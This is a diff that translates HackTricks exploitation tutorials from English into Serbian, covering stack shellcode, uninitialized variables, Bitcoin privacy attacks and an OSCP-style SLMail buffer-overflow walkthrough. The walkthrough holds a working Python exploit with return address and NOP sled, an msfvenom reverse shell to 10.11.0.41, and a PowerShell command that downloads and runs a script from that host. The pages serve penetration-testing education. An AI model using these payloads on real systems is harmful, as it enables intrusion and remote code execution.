-This script constructs a payload consisting of a **NOP slide**, the **shellcode**, and then overwrites the **EIP** with the address pointing to the NOP slide, ensuring the shellcode gets executed.
+**NOP slide** (`asm('nop')`) se koristi za povećanje šanse da će izvršenje "kliznuti" u naš shellcode bez obzira na tačnu adresu. Prilagodite `p32()` argument na početnu adresu vašeg bafera plus pomeraj da biste sleteli u NOP slide.
 
-The **NOP slide** (`asm('nop')`) is used to increase the chance that execution will "slide" into our shellcode regardless of the exact address. Adjust the `p32()` argument to the starting address of your buffer plus an offset to land in the NOP slide.
+## Zaštite
 
-## Protections
+- [**ASLR**](../../common-binary-protections-and-bypasses/aslr/) **treba da bude onemogućen** da bi adresa bila pouzdana tokom izvršenja ili adresa na kojoj će funkcija biti smeštena neće uvek biti ista i biće vam potrebna neka leak da biste saznali gde je win funkcija učitana.
+- [**Stack Canaries**](../../common-binary-protections-and-bypasses/stack-canaries/) takođe treba da budu onemogućene ili prepisana EIP adresa za povratak nikada neće biti praćena.
+- [**NX**](../../common-binary-protections-and-bypasses/no-exec-nx.md) **stack** zaštita bi sprečila izvršenje shellcode unutar steka jer ta oblast neće biti izvršna.
 
-- [**ASLR**](../../common-binary-protections-and-bypasses/aslr/) **should be disabled** for the address to be reliable across executions or the address where the function will be stored won't be always the same and you would need some leak in order to figure out where is the win function loaded.
-- [**Stack Canaries**](../../common-binary-protections-and-bypasses/stack-canaries/) should be also disabled or the compromised EIP return address won't never be followed.
-- [**NX**](../../common-binary-protections-and-bypasses/no-exec-nx.md) **stack** protection would prevent the execution of the shellcode inside the stack because that region won't be executable.
-
-## Other Examples & References
+## Ostali Primeri & Reference
 
 - [https://ir0nstone.gitbook.io/notes/types/stack/shellcode](https://ir0nstone.gitbook.io/notes/types/stack/shellcode)
 - [https://guyinatuxedo.github.io/06-bof_shellcode/csaw17_pilot/index.html](https://guyinatuxedo.github.io/06-bof_shellcode/csaw17_pilot/index.html)
-  - 64bit, ASLR with stack address leak, write shellcode and jump to it
+- 64bit, ASLR sa leak-om adrese steka, napiši shellcode i skoči na njega
 - [https://guyinatuxedo.github.io/06-bof_shellcode/tamu19_pwn3/index.html](https://guyinatuxedo.github.io/06-bof_shellcode/tamu19_pwn3/index.html)
-  - 32 bit, ASLR with stack leak, write shellcode and jump to it
+- 32 bit, ASLR sa leak-om steka, napiši shellcode i skoči na njega
 - [https://guyinatuxedo.github.io/06-bof_shellcode/tu18_shellaeasy/index.html](https://guyinatuxedo.github.io/06-bof_shellcode/tu18_shellaeasy/index.html)
-  - 32 bit, ASLR with stack leak, comparison to prevent call to exit(), overwrite variable with a value and write shellcode and jump to it
+- 32 bit, ASLR sa leak-om steka, poređenje da se spreči poziv na exit(), prepiši promenljivu sa vrednošću i napiši shellcode i skoči na njega
 - [https://8ksec.io/arm64-reversing-and-exploitation-part-4-using-mprotect-to-bypass-nx-protection-8ksec-blogs/](https://8ksec.io/arm64-reversing-and-exploitation-part-4-using-mprotect-to-bypass-nx-protection-8ksec-blogs/)
-  - arm64, no ASLR, ROP gadget to make stack executable and jump to shellcode in stack
+- arm64, bez ASLR, ROP gadget za izvršavanje steka i skakanje na shellcode u steku
 
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/binary-exploitation/stack-overflow/stack-shellcode/stack-shellcode-arm64.md b/src/binary-exploitation/stack-overflow/stack-shellcode/stack-shellcode-arm64.md
index 3ad3e61ac..02587173b 100644
--- a/src/binary-exploitation/stack-overflow/stack-shellcode/stack-shellcode-arm64.md
+++ b/src/binary-exploitation/stack-overflow/stack-shellcode/stack-shellcode-arm64.md
@@ -2,47 +2,40 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-Find an introduction to arm64 in:
+Pronađite uvod u arm64 u:
 
 {{#ref}}
 ../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md
 {{#endref}}
 
 ## Code 
-
 ```c
 #include 
 #include 
 
 void vulnerable_function() {
-    char buffer[64];
-    read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability
+char buffer[64];
+read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability
 }
 
 int main() {
-    vulnerable_function();
-    return 0;
+vulnerable_function();
+return 0;
 }
 ```
-
-Compile without pie, canary and nx:
-
+Kompajlirati bez pie, kanarinca i nx:
 ```bash
 clang -o bof bof.c -fno-stack-protector -Wno-format-security -no-pie -z execstack
 ```
+## Nema ASLR i nema kanarinca - Stack Overflow 
 
-## No ASLR & No canary - Stack Overflow 
-
-To stop ASLR execute:
-
+Da biste zaustavili ASLR, izvršite:
 ```bash
 echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
 ```
+Da biste dobili [**offset od bof proverite ovaj link**](../ret2win/ret2win-arm64.md#finding-the-offset).
 
-To get the [**offset of the bof check this link**](../ret2win/ret2win-arm64.md#finding-the-offset).
-
-Exploit:
-
+Eksploatacija:
 ```python
 from pwn import *
 
@@ -73,9 +66,8 @@ p.send(payload)
 # Drop to an interactive session
 p.interactive()
 ```
+Jedina "komplikovana" stvar koju treba pronaći ovde bi bila adresa u steku koju treba pozvati. U mom slučaju, generisao sam exploit sa adresom pronađenom pomoću gdb, ali kada sam ga iskoristio, nije radilo (jer se adresa steka malo promenila).
 
-The only "complicated" thing to find here would be the address in the stack to call. In my case I generated the exploit with the address found using gdb, but then when exploiting it it didn't work (because the stack address changed a bit).
-
-I opened the generated **`core` file** (`gdb ./bog ./core`) and checked the real address of the start of the shellcode.
+Otvorio sam generisani **`core` fajl** (`gdb ./bog ./core`) i proverio pravu adresu početka shellcode-a.
 
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/binary-exploitation/stack-overflow/uninitialized-variables.md b/src/binary-exploitation/stack-overflow/uninitialized-variables.md
index 6cde48bee..412cdeff5 100644
--- a/src/binary-exploitation/stack-overflow/uninitialized-variables.md
+++ b/src/binary-exploitation/stack-overflow/uninitialized-variables.md
@@ -1,68 +1,66 @@
-# Uninitialized Variables
+# Neinicijalizovane Promenljive
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Basic Information
+## Osnovne Informacije
 
-The core idea here is to understand what happens with **uninitialized variables as they will have the value that was already in the assigned memory to them.** Example:
+Osnovna ideja ovde je da se razume šta se dešava sa **neinicijalizovanim promenljivama jer će imati vrednost koja je već bila u dodeljenoj memoriji za njih.** Primer:
 
-- **Function 1: `initializeVariable`**: We declare a variable `x` and assign it a value, let's say `0x1234`. This action is akin to reserving a spot in memory and putting a specific value in it.
-- **Function 2: `useUninitializedVariable`**: Here, we declare another variable `y` but do not assign any value to it. In C, uninitialized variables don't automatically get set to zero. Instead, they retain whatever value was last stored at their memory location.
+- **Funkcija 1: `initializeVariable`**: Deklarisemo promenljivu `x` i dodeljujemo joj vrednost, recimo `0x1234`. Ova akcija je slična rezervisanju mesta u memoriji i stavljanju specifične vrednosti u nju.
+- **Funkcija 2: `useUninitializedVariable`**: Ovde, deklarisemo još jednu promenljivu `y`, ali joj ne dodeljujemo nikakvu vrednost. U C-u, neinicijalizovane promenljive se automatski ne postavljaju na nulu. Umesto toga, zadržavaju bilo koju vrednost koja je poslednja sačuvana na njihovoj memorijskoj lokaciji.
 
-When we run these two functions **sequentially**:
+Kada pokrenemo ove dve funkcije **uzastopno**:
 
-1. In `initializeVariable`, `x` is assigned a value (`0x1234`), which occupies a specific memory address.
-2. In `useUninitializedVariable`, `y` is declared but not assigned a value, so it takes the memory spot right after `x`. Due to not initializing `y`, it ends up "inheriting" the value from the same memory location used by `x`, because that's the last value that was there.
+1. U `initializeVariable`, `x` dobija vrednost (`0x1234`), koja zauzima specifičnu adresu u memoriji.
+2. U `useUninitializedVariable`, `y` je deklarisana, ali joj nije dodeljena vrednost, pa zauzima memorijsko mesto odmah nakon `x`. Zbog neinicijalizovanja `y`, ona na kraju "nasleđuje" vrednost iz iste memorijske lokacije koju koristi `x`, jer je to poslednja vrednost koja je bila tamo.
 
-This behavior illustrates a key concept in low-level programming: **Memory management is crucial**, and uninitialized variables can lead to unpredictable behavior or security vulnerabilities, as they may unintentionally hold sensitive data left in memory.
+Ovo ponašanje ilustruje ključni koncept u niskonivou programiranju: **Upravljanje memorijom je ključno**, a neinicijalizovane promenljive mogu dovesti do nepredvidivog ponašanja ili sigurnosnih ranjivosti, jer mogu nenamerno sadržati osetljive podatke ostavljene u memoriji.
 
-Uninitialized stack variables could pose several security risks like:
+Neinicijalizovane promenljive na steku mogu predstavljati nekoliko sigurnosnih rizika kao što su:
 
-- **Data Leakage**: Sensitive information such as passwords, encryption keys, or personal details can be exposed if stored in uninitialized variables, allowing attackers to potentially read this data.
-- **Information Disclosure**: The contents of uninitialized variables might reveal details about the program's memory layout or internal operations, aiding attackers in developing targeted exploits.
-- **Crashes and Instability**: Operations involving uninitialized variables can result in undefined behavior, leading to program crashes or unpredictable outcomes.
-- **Arbitrary Code Execution**: In certain scenarios, attackers could exploit these vulnerabilities to alter the program's execution flow, enabling them to execute arbitrary code, which might include remote code execution threats.
-
-### Example
+- **Curjenje Podataka**: Osetljive informacije kao što su lozinke, ključevi za enkripciju ili lični podaci mogu biti izloženi ako su sačuvani u neinicijalizovanim promenljivama, omogućavajući napadačima da potencijalno pročitaju ove podatke.
+- **Otkrivanje Informacija**: Sadržaj neinicijalizovanih promenljivih može otkriti detalje o rasporedu memorije programa ili unutrašnjim operacijama, pomažući napadačima u razvoju ciljanih eksploatacija.
+- **Rušenja i Nestabilnost**: Operacije koje uključuju neinicijalizovane promenljive mogu rezultirati neodređenim ponašanjem, što dovodi do rušenja programa ili nepredvidivih ishoda.
+- **Izvršavanje Arbitrarnog Koda**: U određenim scenarijima, napadači bi mogli iskoristiti ove ranjivosti da promene tok izvršavanja programa, omogućavajući im da izvrše arbitrarnu kod, što može uključivati pretnje od daljinskog izvršavanja koda.
 
+### Primer
 ```c
 #include 
 
 // Function to initialize and print a variable
 void initializeAndPrint() {
-    int initializedVar = 100; // Initialize the variable
-    printf("Initialized Variable:\n");
-    printf("Address: %p, Value: %d\n\n", (void*)&initializedVar, initializedVar);
+int initializedVar = 100; // Initialize the variable
+printf("Initialized Variable:\n");
+printf("Address: %p, Value: %d\n\n", (void*)&initializedVar, initializedVar);
 }
 
 // Function to demonstrate the behavior of an uninitialized variable
 void demonstrateUninitializedVar() {
-    int uninitializedVar; // Declare but do not initialize
-    printf("Uninitialized Variable:\n");
-    printf("Address: %p, Value: %d\n\n", (void*)&uninitializedVar, uninitializedVar);
+int uninitializedVar; // Declare but do not initialize
+printf("Uninitialized Variable:\n");
+printf("Address: %p, Value: %d\n\n", (void*)&uninitializedVar, uninitializedVar);
 }
 
 int main() {
-    printf("Demonstrating Initialized vs. Uninitialized Variables in C\n\n");
+printf("Demonstrating Initialized vs. Uninitialized Variables in C\n\n");
 
-    // First, call the function that initializes its variable
-    initializeAndPrint();
+// First, call the function that initializes its variable
+initializeAndPrint();
 
-    // Then, call the function that has an uninitialized variable
-    demonstrateUninitializedVar();
+// Then, call the function that has an uninitialized variable
+demonstrateUninitializedVar();
 
-    return 0;
+return 0;
 }
 ```
+#### Kako ovo funkcioniše:
 
-#### How This Works:
+- **`initializeAndPrint` Funkcija**: Ova funkcija deklariše celobrojnu promenljivu `initializedVar`, dodeljuje joj vrednost `100`, a zatim ispisuje i adresu u memoriji i vrednost promenljive. Ovaj korak je jednostavan i pokazuje kako se ponaša inicijalizovana promenljiva.
+- **`demonstrateUninitializedVar` Funkcija**: U ovoj funkciji, deklarišemo celobrojnu promenljivu `uninitializedVar` bez inicijalizacije. Kada pokušamo da ispišemo njenu vrednost, izlaz može prikazati nasumičan broj. Ovaj broj predstavlja bilo koje podatke koji su prethodno bili na toj memorijskoj lokaciji. U zavisnosti od okruženja i kompajlera, stvarni izlaz može varirati, a ponekad, iz bezbednosnih razloga, neki kompajleri mogu automatski inicijalizovati promenljive na nulu, iako se na to ne treba oslanjati.
+- **`main` Funkcija**: `main` funkcija poziva obe gornje funkcije u nizu, demonstrirajući razliku između inicijalizovane i neinicijalizovane promenljive.
 
-- **`initializeAndPrint` Function**: This function declares an integer variable `initializedVar`, assigns it the value `100`, and then prints both the memory address and the value of the variable. This step is straightforward and shows how an initialized variable behaves.
-- **`demonstrateUninitializedVar` Function**: In this function, we declare an integer variable `uninitializedVar` without initializing it. When we attempt to print its value, the output might show a random number. This number represents whatever data was previously at that memory location. Depending on the environment and compiler, the actual output can vary, and sometimes, for safety, some compilers might automatically initialize variables to zero, though this should not be relied upon.
-- **`main` Function**: The `main` function calls both of the above functions in sequence, demonstrating the contrast between an initialized variable and an uninitialized one.
+## ARM64 Primer
 
-## ARM64 Example
-
-This doesn't change at all in ARM64 as local variables are also managed in the stack, you can [**check this example**](https://8ksec.io/arm64-reversing-and-exploitation-part-6-exploiting-an-uninitialized-stack-variable-vulnerability/) were this is shown.
+Ovo se uopšte ne menja u ARM64 jer se lokalne promenljive takođe upravljaju na steku, možete [**proveriti ovaj primer**](https://8ksec.io/arm64-reversing-and-exploitation-part-6-exploiting-an-uninitialized-stack-variable-vulnerability/) gde je ovo prikazano.
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.md b/src/binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.md
index fb6f62862..13f239c0c 100644
--- a/src/binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.md
+++ b/src/binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.md
@@ -1,21 +1,18 @@
-# Windows Exploiting (Basic Guide - OSCP lvl)
+# Windows Exploiting (Osnovni vodič - OSCP nivo)
 
 {{#include ../banners/hacktricks-training.md}}
 
-## **Start installing the SLMail service**
+## **Počnite sa instalacijom SLMail servisa**
 
-## Restart SLMail service
-
-Every time you need to **restart the service SLMail** you can do it using the windows console:
+## Ponovo pokrenite SLMail servis
 
+Svaki put kada treba da **ponovo pokrenete servis SLMail** možete to uraditi koristeći Windows konzolu:
 ```
 net start slmail
 ```
-
 ![](<../images/image (988).png>)
 
-## Very basic python exploit template
-
+## Veoma osnovni python exploit šablon
 ```python
 #!/usr/bin/python
 
@@ -27,99 +24,89 @@ port = 110
 
 buffer = 'A' * 2700
 try:
-    print "\nLaunching exploit..."
-    s.connect((ip, port))
-    data = s.recv(1024)
-    s.send('USER username' +'\r\n')
-    data = s.recv(1024)
-    s.send('PASS ' + buffer + '\r\n')
-    print "\nFinished!."
+print "\nLaunching exploit..."
+s.connect((ip, port))
+data = s.recv(1024)
+s.send('USER username' +'\r\n')
+data = s.recv(1024)
+s.send('PASS ' + buffer + '\r\n')
+print "\nFinished!."
 except:
-    print "Could not connect to "+ip+":"+port
+print "Could not connect to "+ip+":"+port
 ```
+## **Promenite font Immunity Debuggera**
 
-## **Change Immunity Debugger Font**
+Idite na `Options >> Appearance >> Fonts >> Change(Consolas, Blod, 9) >> OK`
 
-Go to `Options >> Appearance >> Fonts >> Change(Consolas, Blod, 9) >> OK`
-
-## **Attach the proces to Immunity Debugger:**
+## **Priključite proces na Immunity Debugger:**
 
 **File --> Attach**
 
 ![](<../images/image (869).png>)
 
-**And press START button**
+**I pritisnite START dugme**
 
-## **Send the exploit and check if EIP is affected:**
+## **Pošaljite exploit i proverite da li je EIP pogođen:**
 
 ![](<../images/image (906).png>)
 
-Every time you break the service you should restart it as is indicated in the beginnig of this page.
+Svaki put kada prekinete servis, trebate ga ponovo pokrenuti kao što je naznačeno na početku ove stranice.
 
-## Create a pattern to modify the EIP
+## Napravite obrazac za modifikaciju EIP-a
 
-The pattern should be as big as the buffer you used to broke the service previously.
+Obrazac bi trebao biti dovoljno velik kao bafer koji ste koristili da prekinete servis prethodno.
 
 ![](<../images/image (420).png>)
-
 ```
 /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 3000
 ```
+Promenite bafer eksploita i postavite obrazac, a zatim pokrenite eksploataciju.
 
-Change the buffer of the exploit and set the pattern and lauch the exploit.
-
-A new crash should appeard, but with a different EIP address:
+Treba da se pojavi novi pad, ali sa drugačijom EIP adresom:
 
 ![](<../images/image (636).png>)
 
-Check if the address was in your pattern:
+Proverite da li je adresa bila u vašem obrascu:
 
 ![](<../images/image (418).png>)
-
 ```
 /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 3000 -q 39694438
 ```
+Izgleda da **možemo modifikovati EIP na offsetu 2606** bafera.
 
-Looks like **we can modify the EIP in offset 2606** of the buffer.
-
-Check it modifing the buffer of the exploit:
-
+Proverite to modifikujući bafer eksploita:
 ```
 buffer = 'A'*2606 + 'BBBB' + 'CCCC'
 ```
-
-With this buffer the EIP crashed should point to 42424242 ("BBBB")
+Sa ovim baferom, EIP se srušio i treba da pokazuje na 42424242 ("BBBB").
 
 ![](<../images/image (874).png>)
 
 ![](<../images/image (92).png>)
 
-Looks like it is working.
+Izgleda da funkcioniše.
 
-## Check for Shellcode space inside the stack
+## Proverite prostor za Shellcode unutar steka
 
-600B should be enough for any powerfull shellcode.
-
-Lets change the bufer:
+600B bi trebalo da bude dovoljno za bilo koji moćan shellcode.
 
+Hajde da promenimo bafer:
 ```
 buffer = 'A'*2606 + 'BBBB' + 'C'*600
 ```
-
-launch the new exploit and check the EBP and the length of the usefull shellcode
+pokrenite novi exploit i proverite EBP i dužinu korisnog shellcode-a
 
 ![](<../images/image (119).png>)
 
 ![](<../images/image (879).png>)
 
-You can see that when the vulnerability is reached, the EBP is pointing to the shellcode and that we have a lot of space to locate a shellcode here.
+Možete videti da kada se dođe do ranjivosti, EBP pokazuje na shellcode i da imamo puno prostora da lociramo shellcode ovde.
 
-In this case we have **from 0x0209A128 to 0x0209A2D6 = 430B.** Enough.
+U ovom slučaju imamo **od 0x0209A128 do 0x0209A2D6 = 430B.** Dovoljno.
 
-## Check for bad chars
-
-Change again the buffer:
+## Proverite loše karaktere
 
+Ponovo promenite bafer:
 ```
 badchars = (
 "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
@@ -141,30 +128,27 @@ badchars = (
 )
 buffer = 'A'*2606 + 'BBBB' + badchars
 ```
+Loši karakteri počinju od 0x01 jer je 0x00 gotovo uvek loš.
 
-The badchars starts in 0x01 because 0x00 is almost always bad.
+Izvršavajte eksploataciju ponovo sa ovim novim baferom brišući karaktere za koje se utvrdi da su beskorisni:
 
-Execute repeatedly the exploit with this new buffer delenting the chars that are found to be useless:.
+Na primer:
 
-For example:
-
-In this case you can see that **you shouldn't use the char 0x0A** (nothing is saved in memory since the char 0x09).
+U ovom slučaju možete videti da **ne biste trebali koristiti karakter 0x0A** (ništa se ne čuva u memoriji pošto je karakter 0x09).
 
 ![](<../images/image (111).png>)
 
-In this case you can see that **the char 0x0D is avoided**:
+U ovom slučaju možete videti da **se karakter 0x0D izbegava**:
 
 ![](<../images/image (1098).png>)
 
-## Find a JMP ESP as a return address
-
-Using:
+## Pronađite JMP ESP kao povratnu adresu
 
+Koristeći:
 ```
 !mona modules    #Get protections, look for all false except last one (Dll of SO)
 ```
-
-You will **list the memory maps**. Search for some DLl that has:
+Ćete **navesti mape memorije**. Potražite neki DLL koji ima:
 
 - **Rebase: False**
 - **SafeSEH: False**
@@ -174,30 +158,25 @@ You will **list the memory maps**. Search for some DLl that has:
 
 ![](<../images/image (555).png>)
 
-Now, inside this memory you should find some JMP ESP bytes, to do that execute:
-
+Sada, unutar ove memorije trebali biste pronaći neke JMP ESP bajtove, da biste to uradili, izvršite:
 ```
 !mona find -s "\xff\xe4" -m name_unsecure.dll # Search for opcodes insie dll space (JMP ESP)
 !mona find -s "\xff\xe4" -m slmfc.dll # Example in this case
 ```
-
-**Then, if some address is found, choose one that don't contain any badchar:**
+**Zatim, ako se pronađe neka adresa, izaberite onu koja ne sadrži nikakve badchar:**
 
 ![](<../images/image (605).png>)
 
-**In this case, for example: \_0x5f4a358f**\_
-
-## Create shellcode
+**U ovom slučaju, na primer: \_0x5f4a358f**\_
 
+## Kreirajte shellcode
 ```
 msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.41 LPORT=443 -f c -b '\x00\x0a\x0d'
 msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.webClient).downloadString('http://10.11.0.41/nishang.ps1')\"" -f python -b '\x00\x0a\x0d'
 ```
+Ako eksploatacija ne funkcioniše, ali bi trebala (možete videti sa ImDebg da je shellcode dostignut), pokušajte da kreirate druge shellcode-ove (msfvenom sa kreiranjem različitih shellcode-ova za iste parametre).
 
-If the exploit is not working but it should (you can see with ImDebg that the shellcode is reached), try to create other shellcodes (msfvenom with create different shellcodes for the same parameters).
-
-**Add some NOPS at the beginning** of the shellcode and use it and the return address to JMP ESP, and finish the exploit:
-
+**Dodajte neke NOPS na početak** shellcode-a i koristite ga zajedno sa povratnom adresom za JMP ESP, i završite eksploataciju:
 ```bash
 #!/usr/bin/python
 
@@ -236,26 +215,23 @@ shellcode = (
 
 buffer = 'A' * 2606 + '\x8f\x35\x4a\x5f' + "\x90" * 8 + shellcode
 try:
-    print "\nLaunching exploit..."
-    s.connect((ip, port))
-    data = s.recv(1024)
-    s.send('USER username' +'\r\n')
-    data = s.recv(1024)
-    s.send('PASS ' + buffer + '\r\n')
-    print "\nFinished!."
+print "\nLaunching exploit..."
+s.connect((ip, port))
+data = s.recv(1024)
+s.send('USER username' +'\r\n')
+data = s.recv(1024)
+s.send('PASS ' + buffer + '\r\n')
+print "\nFinished!."
 except:
-    print "Could not connect to "+ip+":"+port
+print "Could not connect to "+ip+":"+port
 ```
-
 > [!WARNING]
-> There are shellcodes that will **overwrite themselves**, therefore it's important to always add some NOPs before the shellcode
+> Postoje shellcode-ovi koji će **prepisati sebe**, stoga je važno uvek dodati nekoliko NOP-ova pre shellcode-a
 
-## Improving the shellcode
-
-Add this parameters:
+## Poboljšanje shellcode-a
 
+Dodajte ove parametre:
 ```bash
 EXITFUNC=thread -e x86/shikata_ga_nai
 ```
-
 {{#include ../banners/hacktricks-training.md}}
diff --git a/src/blockchain/blockchain-and-crypto-currencies/README.md b/src/blockchain/blockchain-and-crypto-currencies/README.md
index c897d0035..56c792059 100644
--- a/src/blockchain/blockchain-and-crypto-currencies/README.md
+++ b/src/blockchain/blockchain-and-crypto-currencies/README.md
@@ -1,180 +1,176 @@
 {{#include ../../banners/hacktricks-training.md}}
 
-## Basic Concepts
+## Osnovni Koncepti
 
-- **Smart Contracts** are defined as programs that execute on a blockchain when certain conditions are met, automating agreement executions without intermediaries.
-- **Decentralized Applications (dApps)** build upon smart contracts, featuring a user-friendly front-end and a transparent, auditable back-end.
-- **Tokens & Coins** differentiate where coins serve as digital money, while tokens represent value or ownership in specific contexts.
-  - **Utility Tokens** grant access to services, and **Security Tokens** signify asset ownership.
-- **DeFi** stands for Decentralized Finance, offering financial services without central authorities.
-- **DEX** and **DAOs** refer to Decentralized Exchange Platforms and Decentralized Autonomous Organizations, respectively.
+- **Pametni ugovori** definišu se kao programi koji se izvršavaju na blockchain-u kada su ispunjeni određeni uslovi, automatizujući izvršenja sporazuma bez posrednika.
+- **Decentralizovane aplikacije (dApps)** se oslanjaju na pametne ugovore, imajući korisnički prijatan front-end i transparentan, auditable back-end.
+- **Tokeni i Kovanice** se razlikuju, pri čemu kovanice služe kao digitalni novac, dok tokeni predstavljaju vrednost ili vlasništvo u specifičnim kontekstima.
+- **Utility tokeni** omogućavaju pristup uslugama, a **Security tokeni** označavaju vlasništvo nad imovinom.
+- **DeFi** označava decentralizovane finansije, nudeći finansijske usluge bez centralnih vlasti.
+- **DEX** i **DAO** se odnose na decentralizovane berzanske platforme i decentralizovane autonomne organizacije, redom.
 
-## Consensus Mechanisms
+## Mehanizmi Konsenzusa
 
-Consensus mechanisms ensure secure and agreed transaction validations on the blockchain:
+Mehanizmi konsenzusa osiguravaju sigurne i dogovorene validacije transakcija na blockchain-u:
 
-- **Proof of Work (PoW)** relies on computational power for transaction verification.
-- **Proof of Stake (PoS)** demands validators to hold a certain amount of tokens, reducing energy consumption compared to PoW.
+- **Proof of Work (PoW)** se oslanja na računarsku snagu za verifikaciju transakcija.
+- **Proof of Stake (PoS)** zahteva od validatora da drže određenu količinu tokena, smanjujući potrošnju energije u poređenju sa PoW.
 
-## Bitcoin Essentials
+## Osnovne Informacije o Bitcoinu
 
-### Transactions
+### Transakcije
 
-Bitcoin transactions involve transferring funds between addresses. Transactions are validated through digital signatures, ensuring only the owner of the private key can initiate transfers.
+Bitcoin transakcije uključuju prebacivanje sredstava između adresa. Transakcije se validiraju putem digitalnih potpisa, osiguravajući da samo vlasnik privatnog ključa može inicirati transfere.
 
-#### Key Components:
+#### Ključne Komponente:
 
-- **Multisignature Transactions** require multiple signatures to authorize a transaction.
-- Transactions consist of **inputs** (source of funds), **outputs** (destination), **fees** (paid to miners), and **scripts** (transaction rules).
+- **Multisignature transakcije** zahtevaju više potpisa za autorizaciju transakcije.
+- Transakcije se sastoje od **ulaza** (izvor sredstava), **izlaza** (odredište), **naknada** (plaćene rudarima) i **skripti** (pravila transakcije).
 
 ### Lightning Network
 
-Aims to enhance Bitcoin's scalability by allowing multiple transactions within a channel, only broadcasting the final state to the blockchain.
+Cilj je poboljšati skalabilnost Bitcoina omogućavanjem više transakcija unutar kanala, samo emitovanjem konačnog stanja na blockchain.
 
-## Bitcoin Privacy Concerns
+## Problemi Privatnosti Bitcoina
 
-Privacy attacks, such as **Common Input Ownership** and **UTXO Change Address Detection**, exploit transaction patterns. Strategies like **Mixers** and **CoinJoin** improve anonymity by obscuring transaction links between users.
+Napadi na privatnost, kao što su **Common Input Ownership** i **UTXO Change Address Detection**, koriste obrasce transakcija. Strategije poput **Mixers** i **CoinJoin** poboljšavaju anonimnost zamagljujući veze transakcija između korisnika.
 
-## Acquiring Bitcoins Anonymously
+## Sticanje Bitcoina Anonimno
 
-Methods include cash trades, mining, and using mixers. **CoinJoin** mixes multiple transactions to complicate traceability, while **PayJoin** disguises CoinJoins as regular transactions for heightened privacy.
+Metode uključuju gotovinske trgovine, rudarenje i korišćenje miksera. **CoinJoin** meša više transakcija kako bi otežao praćenje, dok **PayJoin** prikriva CoinJoins kao obične transakcije radi povećane privatnosti.
 
-# Bitcoin Privacy Atacks
+# Napadi na Privatnost Bitcoina
 
-# Summary of Bitcoin Privacy Attacks
+# Sažetak Napada na Privatnost Bitcoina
 
-In the world of Bitcoin, the privacy of transactions and the anonymity of users are often subjects of concern. Here's a simplified overview of several common methods through which attackers can compromise Bitcoin privacy.
+U svetu Bitcoina, privatnost transakcija i anonimnost korisnika često su predmet zabrinutosti. Evo pojednostavljenog pregleda nekoliko uobičajenih metoda kroz koje napadači mogu kompromitovati privatnost Bitcoina.
 
-## **Common Input Ownership Assumption**
+## **Pretpostavka Zajedničkog Vlasništva Ulaza**
 
-It is generally rare for inputs from different users to be combined in a single transaction due to the complexity involved. Thus, **two input addresses in the same transaction are often assumed to belong to the same owner**.
+Generalno je retko da se ulazi različitih korisnika kombinuju u jednoj transakciji zbog složenosti koja je uključena. Tako se **dve adrese ulaza u istoj transakciji često pretpostavljaju da pripadaju istom vlasniku**.
 
-## **UTXO Change Address Detection**
+## **UTXO Adresa Promene Detekcija**
 
-A UTXO, or **Unspent Transaction Output**, must be entirely spent in a transaction. If only a part of it is sent to another address, the remainder goes to a new change address. Observers can assume this new address belongs to the sender, compromising privacy.
+UTXO, ili **Unspent Transaction Output**, mora biti potpuno potrošen u transakciji. Ako se samo deo pošalje na drugu adresu, ostatak ide na novu adresu promene. Posmatrači mogu pretpostaviti da ova nova adresa pripada pošiljaocu, kompromitujući privatnost.
 
-### Example
+### Primer
 
-To mitigate this, mixing services or using multiple addresses can help obscure ownership.
+Da bi se to ublažilo, usluge mešanja ili korišćenje više adresa mogu pomoći u zamagljivanju vlasništva.
 
-## **Social Networks & Forums Exposure**
+## **Izloženost Društvenih Mreža i Foruma**
 
-Users sometimes share their Bitcoin addresses online, making it **easy to link the address to its owner**.
+Korisnici ponekad dele svoje Bitcoin adrese online, što olakšava **povezivanje adrese sa njenim vlasnikom**.
 
-## **Transaction Graph Analysis**
+## **Analiza Transakcionih Grafova**
 
-Transactions can be visualized as graphs, revealing potential connections between users based on the flow of funds.
+Transakcije se mogu vizualizovati kao grafovi, otkrivajući potencijalne veze između korisnika na osnovu toka sredstava.
 
-## **Unnecessary Input Heuristic (Optimal Change Heuristic)**
+## **Heuristika Nepotrebnog Ulaza (Optimalna Heuristika Promene)**
 
-This heuristic is based on analyzing transactions with multiple inputs and outputs to guess which output is the change returning to the sender.
-
-### Example
+Ova heuristika se zasniva na analizi transakcija sa više ulaza i izlaza kako bi se pogodilo koji izlaz je promena koja se vraća pošiljaocu.
 
+### Primer
 ```bash
 2 btc --> 4 btc
 3 btc     1 btc
 ```
+Ako dodavanje više ulaza čini da promena izlaza bude veća od bilo kog pojedinačnog ulaza, to može zbuniti heuristiku.
 
-If adding more inputs makes the change output larger than any single input, it can confuse the heuristic.
+## **Prisilna Ponovna Upotreba Adresa**
 
-## **Forced Address Reuse**
+Napadači mogu slati male iznose na prethodno korišćene adrese, nadajući se da će primalac kombinovati ove sa drugim ulazima u budućim transakcijama, čime se povezuju adrese.
 
-Attackers may send small amounts to previously used addresses, hoping the recipient combines these with other inputs in future transactions, thereby linking addresses together.
+### Ispravno Ponašanje Novčanika
 
-### Correct Wallet Behavior
+Novčanici bi trebali izbegavati korišćenje kovanica primljenih na već korišćenim, praznim adresama kako bi sprečili ovaj gubitak privatnosti.
 
-Wallets should avoid using coins received on already used, empty addresses to prevent this privacy leak.
+## **Druge Tehnike Analize Blokčejna**
 
-## **Other Blockchain Analysis Techniques**
